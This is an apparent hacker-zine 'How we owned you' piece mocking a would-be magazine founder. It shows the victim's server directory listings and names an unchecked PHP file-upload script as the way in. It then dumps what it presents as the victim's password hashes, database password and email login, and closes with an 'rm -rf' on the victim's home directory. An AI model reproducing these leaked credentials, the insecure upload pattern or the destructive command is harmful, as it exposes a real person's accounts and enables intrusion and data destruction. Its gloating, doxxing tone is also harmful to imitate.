|=-----------=[ C O N T A C T P H R A C K H I G H C O U N C I L ]=---------=|
Editors : phc at phrack.ru
Submissions : phc at phrack.ru
Commentary : phc at phrack.ru
Phrack World News : phc at phrack.ru
Warez Submissions : phc at phrack.ru
...
#, . .P
hr, . .. .Ac
'K#ph, .. . .rAcK'
#ph'Rac, . . .K#P'Hra
Ck' #PHr ... .aCk' #Ph
rA, 'cK#, .pHr' .AC
'K# 'Phr, .aCk' #P'
... rAc ' .K.#P Hra ...
. cK# .pHR .a, cK# .
. .. pH, .rAc' . 'k#P .HR . ..
.. . 'Ac .K#' . 'PHr. '' .. .
. . aCk ' . '#PH, . .
... .rA.'cK' . .. '#PH, ...
.rAc' k#, ..... .PH 'rAc,
.K#P' 'Hr . aC' 'k#P,
.hRa' cK# . pHr 'aCk,
.#Ph'____________________________ rAc ______________'K#P,
.HRACK#PHRACK#PHRACK#PHRACK#PHRACK#'.PH RAC#PHRACK#PHRACK#PHRa.
... cK'
#Pr aCk
#Ph rAc
K#, .Ph
'RA CK'
#P. .hR
aC.K#
PhR
A
[-]=====================================================================[-]
<_daemon@mail.ru> to phc
I hear for you phrack versioning of the phrack.org, i'm interested on
reopen the original magazine, i represent the staff of aristotle and the mentor
and create a new magazine with the same fidelity of phrack magazine but with another
name: the crackenfind magazine on the url www.consultorioinformatico.info has a part of
Consultorio Networks. he webpage is iopen in this week and the first number is
ready, i glad to invitate to colaborate in crackenfind magazine, i pernally glad to
participate on your magazine as the same.
thanks and bye
AzRaEL [NuKE]
represent the staff of aristotle and the mentor
Member of AntiOnline, fr33d0m, astalavista, 2600 Brain Damage, el-hacker ,
c-group, itfreaks, consultorioinformatico and some others communities. Dedicate
all 25 hours at day to investigate and coding for security audits. Hacker hunter
and many years virus writter.
----------------------------------------------------------------------------------------
to <_daemon@mail.ru>
PHC would gladly like to contribute to your magazine, our article is intitled
"How we owned you", we do hope you enjoy the article and consider it for publishing.
---------
CONTENTS:
0x00 - your public_html/
0x06 - your ~/home
0x06 - How we did it.
0x06 - passwdz
0x01 - rm -rf ~/
---------
-0x00 - your public_html/
# ls -al
drwxr-x--- 18 p2005266 nobody 4096 Apr 19 16:46 .
drwx--x--x 14 p2005266 p2005266 4096 Apr 19 16:45 ..
-rw-r--r-- 1 p2005266 p2005266 86 Nov 20 18:22 .htaccess
d--------- 2 p2005266 p2005266 4096 Jan 19 15:03 CdbRwS
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:03 _private
drwxr-xr-x 4 p2005266 p2005266 4096 Jan 19 15:03 _vti_bin
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:03 _vti_cnf
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:03 _vti_log
drwxr-x--- 2 p2005266 nobody 4096 Apr 16 21:38 _vti_pvt
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:03 _vti_txt
drwxr-xr-x 4 p2005266 p2005266 4096 Apr 19 06:49 archives
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 19 00:13 cgi-bin
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 18 23:23 cracken__
-rw-r--r-- 1 p2005266 p2005266 10889 Apr 18 23:22 editor.php
-rw-r--r-- 1 p2005266 p2005266 9790 Apr 19 00:24 forums.php
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 19 16:46 hardsoft
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 19 00:20 images
-rw-r--r-- 1 p2005266 p2005266 12027 Apr 19 06:53 index.php
drwxr-xr-x 4 p2005266 p2005266 4096 Apr 18 23:25 magazine
drwxr-xr-x 5 p2005266 p2005266 4096 Apr 19 01:12 news
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 19 20:25 upload
-rw-r--r-- 1 p2005266 p2005266 5758 Apr 19 02:08 upload.php
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 18 23:42 who
0x06 - your ~/home
# ls -al ~
drwx--x--x 14 p2005266 p2005266 4096 Apr 19 16:45 .
drwx--x--x 539 root root 20480 Apr 19 13:08 ..
-rw-r--r-- 1 p2005266 p2005266 204 Apr 16 00:09 .addon-installlog
-rw------- 1 p2005266 p2005266 17 Apr 16 00:08 .addonscgi-MamboOpenSource
-rw------- 1 p2005266 p2005266 19 Apr 16 00:09 .addonscgi-cPSupport
-rw------- 1 p2005266 p2005266 0 Aug 14 2005 .bash_history
-rw-r--r-- 1 p2005266 p2005266 304 Jan 19 15:50 .bash_logout
-rw-r--r-- 1 p2005266 p2005266 191 Jan 19 15:50 .bash_profile
-rw-r--r-- 1 p2005266 p2005266 124 Jan 19 15:50 .bashrc
-rw------- 1 p2005266 p2005266 19 Jan 3 02:41 .contactemail
drwx------ 2 p2005266 p2005266 4096 Apr 19 16:45 .cpanel-datastore
-rw-r--r-- 1 p2005266 p2005266 383 Jan 19 15:50 .emacs
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:04 .fantasticodata
drwxr-xr-x 4 p2005266 p2005266 4096 Apr 17 09:02 .htpasswds
-rw------- 1 p2005266 p2005266 13 Apr 19 16:45 .lastlogin
-rw-r--r-- 1 p2005266 p2005266 36 Nov 18 03:03 .mailboxlist
drwx------ 2 p2005266 p2005266 4096 Apr 12 01:01 .sqmaildata
drwx------ 2 p2005266 p2005266 4096 Apr 16 21:56 .trash
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 18 23:11 cracken__
drwxr-x--- 3 p2005266 mail 4096 Apr 19 16:46 etc
-rw-r--r-- 1 p2005266 p2005266 655 Aug 9 2005 index.htm
drwxrwx--- 3 p2005266 mail 4096 Apr 12 01:01 mail
drwxr-x--- 3 p2005266 p2005266 4096 Apr 17 09:03 public_ftp
drwxr-x--- 18 p2005266 nobody 4096 Apr 19 16:46 public_html
drwx------ 3 p2005266 p2005266 4096 Apr 12 02:22 ssl
drwxr-xr-x 7 p2005266 p2005266 4096 Jan 19 15:04 tmp
lrwxrwxrwx 1 root root 11 Jan 19 15:51 www -> public_html
0x06 - How we did it.
"Dedicate all 25 hours at day to investigate and coding for security audits."
----
your fucking amazing if you can spend 25hours a day being a hacker hunter, and
auditing code, maybe you should audit your own code?
# cat upload.php
<?
if($_POST[enviar]) {
if($_FILES[archivo][size] <= 100000) {
move_uploaded_file($_FILES[archivo][tmp_name],'upload/'.$_FILES[archivo][name]) ;
echo 'The file has been uploaded sussesfull !!!' ;
} else {
echo 'El archivo supera los 100 Kb.' ;
}
//LOOK WE PERFROM NO FILE CHECKZ PLEASE HAQ US!
}
?>
<form method="post" action=""
enctype="multipart/form-dat a">
<input type="file" name="archivo">
<input type="submit" name="enviar" value="submit">
</form>
</center>
<BR>
<left>
<span class="Estilo3">Note: The articles subbmitted has passed for
staff revision and take a lot of time for aproved and publish. CrackenFind reserve
the right for publish or not this submision.
</left>
<BR>
<left>
<span class="Estilo3">CrackenFind Staff
</left>
-------------
0x06 - passwdz
//FRONT PAGE PASSWDZ
# -FrontPage-
administrators: p2005266
authors:
p2005266:5mp6MyvoH6sto
vti_encoding:SR|utf8-nl
ValidEndUsers:false
UseDfltRealm:false
vti_encoding:SR|utf8-nl
//ACCOUNT PASSWDZ
-bash-3.00# grep p2005266 /etc/shadow
p2005266:$1$8na.ab34$28mnOIPJcL7R3T9PwPMjN.:13254:0:99999:7:::
//CPANEL PASSWDZ
crackenfind:$1$S4c9pql5$2UcbzqP1nsXaU9J/JyWq81:::::::
//MYSQL ANYBODY?
$db_name = "p2005266_news";
$db_user = "p2005266_azrael";
$db_passwd = "killflesta";
$db_server = "localhost";
//EMAIL^$#
eng.mail.ru user _daemon / pass l0ck3d
Click Here -> (X)
0x01 - rm -rf ~/
//oopz. i slipped.
-bash3.00# rm -rf /home/p2005266/
-------------------------------------------------------------------
PHC hopes this article helps you and is published in your "security" magazine.
- Phrack High Council, 2006 AD